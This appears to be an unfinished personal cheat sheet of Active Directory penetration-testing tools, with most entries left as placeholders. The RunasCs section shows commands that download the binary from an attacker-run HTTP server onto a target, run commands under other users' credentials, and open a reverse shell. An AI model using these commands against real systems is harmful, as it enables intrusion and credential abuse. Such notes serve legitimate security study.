Tools and Utilities (WIP)

Here we can find some tools and utilities commonly used for practices related to Active Directory:

ADPEAS

• H

kerbruter

• Brute-forcing attacks on Kerberos environments

ldapdomaindump

• H

bloodhound

• H

certutil

• Binary for certificate management, encryption, decryption, hashing, file verification, and remote file download, among others.

• It comes by default on Windows Systems

Commands

• Usage

certutil -encode $file $outFile # Convert file to base64 certificate

RunasCs

• The utility to run specific processes with permissions different from the user's current login is provided using explicit credentials.

• https://github.com/antonioCoco/RunasCs

Commands

• Installation

https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 #go her and download the zip file and decompress it

---

• Usage

#Host machine
cd RunasCs
python3 -m http.server $port #Create server to send file

#Target machine
cd C:\
mkdir Temp
cd Temp
wget http://$MyIP:$port/RunasCs.exe -outFile  RunasCs.exe
RunasCs.exe $username $pass $command #Execute a command as another user
RunasCs.exe $username $pass $command -r $IP:$port #Execute and generate RevShell

Netexec

• H

SMBmap

• H

bloody

• H

pwdump

• H

Powerview

• H

ophcrack

• H